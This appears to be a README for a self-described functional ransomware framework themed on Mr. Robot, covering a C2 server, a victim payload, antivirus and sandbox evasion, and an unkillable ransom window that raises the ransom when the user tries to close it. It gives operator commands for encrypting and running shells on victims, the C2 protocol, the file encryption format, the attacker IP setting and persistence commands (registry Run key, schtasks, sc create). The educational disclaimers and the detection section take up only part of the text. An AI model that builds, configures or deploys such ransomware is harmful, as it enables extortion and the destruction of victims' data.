Advanced Ransomware Research & Educational Framework
"Sometimes I dream of saving the world..." - Elliot Alderson
THIS PROJECT IS STRICTLY FOR EDUCATIONAL AND AUTHORIZED SECURITY RESEARCH ONLY
This is a fully functional ransomware framework designed to demonstrate advanced malware techniques for cybersecurity education and defensive research.
- UNAUTHORIZED USE IS ILLEGAL and may violate federal, state, and international laws
- DO NOT deploy on systems you do not own or have explicit written authorization to test
- DO NOT use for malicious purposes under any circumstances
- The authors assume ZERO LIABILITY for misuse or damage
- This software is provided AS-IS for controlled lab environments ONLY
- Academic cybersecurity research in isolated environments
- Malware analysis training in sandboxed VMs
- Red team exercises with proper authorization
- Defensive security tool development and testing
- Overview
- Key Features
- Architecture
- Project Structure
- Installation
- Usage Guide
- Technical Deep Dive
- Security Research
- Defense Strategies
- Contributing
- References
MrRobot Quantum Ransomware Framework is a sophisticated, production-grade ransomware simulation implementing cutting-edge malware techniques. This framework demonstrates the complete attack lifecycle from initial compromise to data encryption and ransom negotiation.
- Complete C2 Infrastructure: Full command-and-control server with victim management
- Hybrid Encryption: Military-grade RSA-2048 + AES-256 encryption
- Advanced Evasion: Multi-layered antivirus and sandbox bypass techniques
- Persistent Interface: Unkillable GUI with psychological pressure tactics
- Database Management: SQLite-based victim tracking and key management
- Real-World Simulation: Implements actual ransomware behaviors and techniques
Quantum Attacker v4.4 - Complete C2 Server
-
Victim Management System
- SQLite database for victim tracking (
victims.db) - Unique victim ID generation with IP tracking
- Encrypted file count monitoring
- Victim status dashboard
- SQLite database for victim tracking (
-
RSA Key Management
- Automated RSA-2048 key pair generation
- Per-victim key isolation
- Secure key storage and retrieval
- Key export functionality
-
Command & Control Server
- Multi-threaded victim handling
- JSON-based encrypted communication
- Real-time victim status monitoring
- Interactive command interface
-
Remote Operations
encrypt- Trigger file encryption on victimdecrypt- Decrypt files with private keyscan- Enumerate files on victim systemstatus- Get victim system informationshell- Execute arbitrary commandsdisconnect- Cleanly disconnect victim
Automated compromise sequence with two-stage execution:
- Stage 1: Windows Defender kernel-level bypass
- Stage 2: Quantum Victim client deployment
- Dependency auto-installation
- Administrator privilege checking
- Execution monitoring and recovery
Quantum Victim v4.1 - Complete ransomware payload
-
Hybrid Encryption Engine
- RSA-2048 public key encryption
- AES-256-CTR per-file encryption
- Unique AES key per file
- Secure key wrapping with PKCS1_OAEP
- Fallback XOR encryption if crypto unavailable
-
File Operations
- Recursive directory scanning
- Configurable file extension targeting
.MrRobotencrypted file extension- Secure original file deletion
- Integrity verification
-
C2 Communication
- Persistent connection with retry logic
- JSON protocol with length prefixing
- Socket health monitoring
- Automatic reconnection
- Command execution loop
-
Visual Impact
- Wallpaper replacement
- Task Manager disabling
- Ransom interface launching
- Desktop warning creation
Persistent Edition - Unkillable GUI with psychological warfare
-
Window Persistence
- Disabled close button
- Always-on-top enforcement
- Anti-minimize protection
- Window message hooking
- Automatic restart on termination
-
Psychological Pressure
- Countdown timer (72 hours)
- Increasing ransom amount on close attempts
- Error sounds and visual warnings
- Desktop warning file creation
- Close attempt logging
-
User Interface
- Mr. Robot themed design
- Bitcoin payment instructions
- QR code generation
- File count display
- Background music (Mr. Robot theme)
- Glitch effects and animations
-
Anti-Tampering
- Process monitoring
- Window state restoration
- Heartbeat mechanism
- Multiple protection layers
Comprehensive multi-layered evasion framework
-
Static Evasion
- Polymorphic code generation
- Import Address Table (IAT) bypass
- Entropy manipulation
- Signature avoidance
-
Dynamic Evasion
- Sandbox detection (VM, debugger, analysis tools)
- API hook bypass via direct syscalls
- Sleep bombs and timing checks
- Behavioral analysis evasion
-
Advanced Techniques
- Memory analysis bypass
- Anti-dumping protection
- Protected memory allocation
- Execution continuity assurance
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β ATTACKER INFRASTRUCTURE β
β (Quantum Attacker v4.4) β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β
β ββββββββββββββββββ ββββββββββββββββ ββββββββββββββββββββ β
β β C2 Server β β Key Manager β β Victim Database β β
β β (Port 5555) ββββ€ (RSA-2048) ββββ€ (SQLite) β β
β ββββββββββ¬ββββββββ ββββββββββββββββ ββββββββββββββββββββ β
β β β
β β Commands: encrypt, decrypt, scan, status, shell β
β β Protocol: JSON over TCP with length prefix β
βββββββββββββΌββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β
β Encrypted C2 Channel
β
βΌ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β VICTIM SYSTEM β
β (Quantum Victim v4.1) β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β
β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β β STAGE 1: System Compromise β β
β β ββββββββββββββββββ ββββββββββββββββββββββββββ β β
β β β main.py ββββββββββΊβ Antivirus_bp.py β β β
β β β Orchestrator β β Multi-layer Evasion β β β
β β ββββββββββββββββββ ββββββββββββββββββββββββββ β β
β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β β β
β βΌ β
β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β β STAGE 2: Payload Execution β β
β β ββββββββββββββββββ ββββββββββββββββββββββββββ β β
β β β victim.py ββββββββββΊβ Encryption Engine β β β
β β β C2 Client β β RSA-2048 + AES-256 β β β
β β ββββββββββ¬ββββββββ ββββββββββββββββββββββββββ β β
β β β β β
β β βΌ β β
β β ββββββββββββββββββββββββββββββββββββββββββββββββββββββ β β
β β β interface_integration.py β β β
β β β Persistent Ransom Interface β β β
β β β β’ Unkillable Window β’ Countdown Timer β β β
β β β β’ Bitcoin Payment β’ Psychological Pressure β β β
β β ββββββββββββββββββββββββββββββββββββββββββββββββββββββ β β
β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β β
β Encrypted Files: *.MrRobot β
β Persistence: Registry, Startup, Scheduled Tasks β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
MrRobot/
β
βββ Attacker/
β βββ last version/
β βββ attack.py # [42KB] Complete C2 server with victim management
β
βββ Victim/
β βββ last version/
β βββ main.py # [6.6KB] Main orchestrator - 2-stage execution
β βββ victim.py # [54KB] Core ransomware client
β βββ interface_integration.py # [40KB] Persistent ransom GUI
β βββ Antivirus_bp.py # [12KB] Multi-layer evasion framework
β βββ REQUIREMENTS.txt # [2.5KB] Python dependencies
β βββ installer.bash # Bash installation script
β βββ win10_activate.ps1 # PowerShell activation script
β βββ mrrobot2.png # [1.9MB] Interface background image
β βββ mrrobot_inter.png # [2.0MB] Alternative interface image
β βββ mrrobot_sound.mp3 # [4.2MB] Mr. Robot theme audio
β
βββ Incompleted files/ # Work in progress components
βββ malware_project-report.pdf # [758KB] Detailed technical documentation
βββ showing_the_instialization_part.txt # Demo video link
βββ README.md # This file
- Operating System: Windows 10/11 (for full feature support)
- Python: 3.8 or higher
- Privileges: Administrator rights (for bypass features)
- Environment: Isolated VM or sandbox (MANDATORY)
# Core cryptography
pip install pycryptodome>=3.17.0
pip install cryptography>=41.0.0
pip install rsa>=4.9
# GUI and interface
pip install pillow>=10.0.0
pip install pygame>=2.5.0
pip install qrcode>=7.4
# System interaction
pip install psutil>=5.9.0
pip install pywin32>=306
# Network and data
pip install requests>=2.31.0
pip install urllib3>=2.0.0
# Terminal UI
pip install colorama>=0.4.6
pip install windows-curses>=2.3.0
# Optional: Compilation
pip install pyinstaller>=5.13.0
pip install nuitka>=1.7# Navigate to victim directory
cd "c:\Users\AYOUB\Downloads\MrRobot\Victim\last version"
# Install all dependencies
pip install -r REQUIREMENTS.txtNEVER run this on a production system!
-
Create a Virtual Machine:
- Use VMware, VirtualBox, or Hyper-V
- Snapshot before testing
- Disable network bridging (use NAT)
- Disable shared folders
-
Network Isolation:
- Create isolated virtual network
- No internet access for victim VM
- Attacker and victim on same virtual network
-
Backup Everything:
- Snapshot VM before execution
- Backup any test files
- Document all changes
cd "c:\Users\AYOUB\Downloads\MrRobot\Attacker\last version"
python attack.pyWhat happens:
- Server starts on
0.0.0.0:5555 - SQLite database
victims.dbis created - Interactive command interface launches
- Waits for victim connections
Once the server is running:
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β QUANTUM ATTACKER CONTROL PANEL β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Available Commands:
list - Show all connected victims
encrypt <id> <path> - Encrypt files on victim
decrypt <id> - Decrypt all files on victim
scan <id> <path> - Scan directory on victim
status <id> - Get victim system status
shell <id> <command> - Execute shell command
keys <id> - Show victim RSA keys
export <id> - Export keys to files
disconnect <id> - Disconnect victim
help - Show this menu
exit - Shutdown server
Example workflow:
# List connected victims
>>> list
# Scan victim's documents
>>> scan 1 C:\Users\Victim\Documents
# Encrypt the documents
>>> encrypt 1 C:\Users\Victim\Documents
# Check status
>>> status 1
# Later: decrypt files
>>> decrypt 1
# Export keys for offline decryption
>>> export 1cd "c:\Users\AYOUB\Downloads\MrRobot\Victim\last version"
# Run as Administrator
python main.pyExecution sequence:
- β Checks administrator privileges
- β Installs dependencies (psutil, pycryptodome)
- β
Stage 1: Runs
Antivirus_bp.py(Defender bypass) - β
Stage 2: Launches
victim.py(ransomware client) - β Connects to attacker C2 server
- β³ Waits for commands
# Step 1: Run evasion first (optional)
python Antivirus_bp.py
# Step 2: Run victim client
python victim.pyEdit victim.py to configure:
# Line ~684: Set attacker IP and port
def __init__(self, attacker_ip='192.168.44.133', attacker_port=5555):
self.attacker_ip = attacker_ip # Change to your C2 IP
self.attacker_port = attacker_port # Change if neededWhen encryption is triggered:
- Persistent window appears with Mr. Robot theme
- Countdown timer starts (72 hours)
- Bitcoin payment instructions displayed
- File count shows encrypted files
- Close attempts are blocked and punished:
- Ransom amount increases
- Error sounds play
- Warning files created on desktop
- Window automatically restores
# Decrypt all files for victim ID 1
>>> decrypt 1# Export private key
>>> export 1
# On victim machine, use exported private key
python victim.py --decrypt --key private_key.pemHybrid RSA + AES Encryption
-
Key Generation (Attacker):
RSA-2048 key pair generated per victim Public key embedded in victim payload Private key stored in attacker database -
File Encryption (Victim):
For each file: 1. Generate random AES-256 key (32 bytes) 2. Generate random nonce (8 bytes) 3. Encrypt file with AES-256-CTR(key, nonce) 4. Encrypt AES key with RSA-2048 public key (PKCS1_OAEP) 5. Encrypt nonce with RSA-2048 public key (PKCS1_OAEP) 6. Build custom file header 7. Write: [Header][Encrypted AES Key][Encrypted Nonce][Encrypted Data] 8. Rename to: original_name.MrRobot 9. Securely delete original file -
File Header Format:
Offset | Size | Description -------|------|---------------------------------- 0x00 | 4 | Magic: "MRBT" 0x04 | 2 | Version number 0x06 | 2 | Flags 0x08 | 4 | Encrypted AES key length 0x0C | 4 | Encrypted nonce length 0x10 | 8 | Original file size 0x18 | var | RSA-encrypted AES key (256 bytes) var | var | RSA-encrypted nonce (256 bytes) var | var | AES-encrypted file data
JSON over TCP with Length Prefix
# Message format
[4 bytes: message length (big-endian)][JSON payload]
# Example handshake
Client β Server:
{
"type": "handshake",
"victim_id": "a1b2c3d4e5f6",
"hostname": "VICTIM-PC",
"username": "victim_user",
"os": "Windows 10"
}
Server β Client:
{
"type": "handshake_ack",
"public_key": "-----BEGIN RSA PUBLIC KEY-----\n..."
}
# Example encrypt command
Server β Client:
{
"type": "encrypt",
"location": "C:\\Users\\Victim\\Documents"
}
Client β Server:
{
"type": "encrypt_response",
"success": true,
"files_encrypted": 583,
"errors": []
}- Polymorphic Code: Runtime code generation to avoid signatures
- IAT Bypass: Manual DLL loading to hide imports
- Entropy Manipulation: Add random data to appear non-malicious
-
Sandbox Detection:
- VM detection (VMware, VirtualBox, QEMU)
- Debugger detection (IsDebuggerPresent, CheckRemoteDebugger)
- Analysis tool detection (Process Monitor, Wireshark, IDA)
- Resource checks (CPU count, RAM, disk space)
-
API Hook Bypass: Direct syscalls to avoid EDR hooks
-
Sleep Bombs: Timing checks to evade automated analysis
-
Memory Protection: Anti-dumping and anti-analysis
# Registry Run Key
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Value: "MrRobot" = "C:\path\to\victim.exe"
# Startup Folder
C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
# Scheduled Task
schtasks /create /tn "MrRobot" /tr "C:\path\to\victim.exe" /sc onlogon
# Windows Service (requires admin)
sc create MrRobot binPath= "C:\path\to\victim.exe" start= auto-
Understand Ransomware Operations:
- Encryption mechanisms
- C2 communication
- Persistence techniques
- Evasion strategies
-
Develop Detection Capabilities:
- Behavioral analysis
- Network traffic patterns
- File system monitoring
- Registry changes
-
Build Defensive Tools:
- Ransomware detection signatures
- Behavioral blocking rules
- Network-based detection
- Endpoint protection
- Malware Analysis Training: Hands-on experience with real techniques
- SOC Analyst Training: Incident detection and response
- Red Team Exercises: Authorized penetration testing
- Blue Team Defense: Developing countermeasures
- Academic Research: Cybersecurity education
- Outbound connection to port 5555
- JSON-based C2 traffic
- Periodic heartbeat packets
- Large data transfers (file enumeration)
- Files with .MrRobot extension
- Ransom notes on desktop
- interface_integration.py creation
- wallpaper.py creation
- Rapid file modifications
- HKCU\Software\Microsoft\Windows\CurrentVersion\Run modifications
- Task Manager disable registry keys
- Wallpaper change registry keys
- Python.exe with network connections
- Tkinter GUI processes
- High CPU usage during encryption
- Multiple file handle operations
-
Endpoint Protection:
- Enable real-time antivirus
- Use application whitelisting
- Implement least privilege
- Regular security updates
-
Network Security:
- Monitor outbound connections
- Block suspicious ports
- Implement network segmentation
- Use intrusion detection systems
-
Backup Strategy:
- Regular automated backups
- Offline backup storage
- Test restoration procedures
- Version control for critical files
-
User Training:
- Phishing awareness
- Safe browsing practices
- Suspicious file identification
- Incident reporting procedures
# Example: Monitor for .MrRobot files
import os
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
class RansomwareDetector(FileSystemEventHandler):
def on_created(self, event):
if event.src_path.endswith('.MrRobot'):
print(f"[ALERT] Ransomware detected: {event.src_path}")
# Trigger incident responseThis project is for educational purposes. Contributions that enhance learning are welcome:
- Documentation: Improve explanations and comments
- Detection: Add detection signatures and rules
- Defense: Develop mitigation strategies
- Analysis: Provide technical analysis and reports
- Education: Create tutorials and learning materials
- β Features that increase harm potential
- β Obfuscation to evade detection
- β Exploits for unpatched vulnerabilities
- β Techniques for malicious use
- Fork the repository
- Create a feature branch (
git checkout -b feature/educational-enhancement) - Document your changes thoroughly
- Submit a pull request with detailed explanation
- Ensure all contributions maintain educational focus
Below are the visual components deployed on the victim's machine during the encryption phase:
Persistent Ransom Interface![]() (interface_integration.py) |
Victim Desktop Wallpaper![]() (Automated System Takeover) |
- Project Report:
malware_project-report.pdf- Comprehensive technical analysis - Demo Video: See
showing_the_instialization_part.txtfor initialization demonstration
- MITRE ATT&CK - Adversarial tactics and techniques
- NIST Cybersecurity Framework
- OWASP Top 10
This software is provided AS-IS for educational and authorized research purposes ONLY.
- β Permitted: Academic research, authorized security testing, malware analysis training
- β Prohibited: Unauthorized deployment, malicious use, distribution without disclaimer
- βοΈ Liability: Authors accept NO responsibility for misuse or damages
- π Compliance: Users must comply with all applicable laws and regulations
If you discover vulnerabilities or improvements:
- Report security issues responsibly
- Do not exploit for malicious purposes
- Contribute defensive measures
- Support the cybersecurity community
This project draws inspiration from the TV series Mr. Robot, which portrays realistic hacking scenarios and cybersecurity concepts. The framework is designed to help students and professionals understand the technical reality behind such scenarios.
- Beginner: Understand basic encryption and C2 communication
- Intermediate: Analyze evasion techniques and persistence
- Advanced: Develop detection and mitigation strategies
- Expert: Build comprehensive defense frameworks
- Issues: Use GitHub Issues for bugs or questions
- Security: Report vulnerabilities responsibly
- Research: Contact for academic collaboration
- Training: Available for authorized security training
- Share defensive strategies
- Contribute detection signatures
- Develop mitigation tools
- Educate others responsibly
This is a REAL, FUNCTIONAL ransomware framework.
Use ONLY in isolated, controlled environments.
Unauthorized use is ILLEGAL and UNETHICAL.
"Sometimes I dream of saving the world. Saving everyone from the invisible hand... but I can't stop it. I'm not that special. I'm just anonymous. I'm just alone."
- Elliot Alderson, Mr. Robot
Stay Secure. Stay Ethical. Stay Legal.

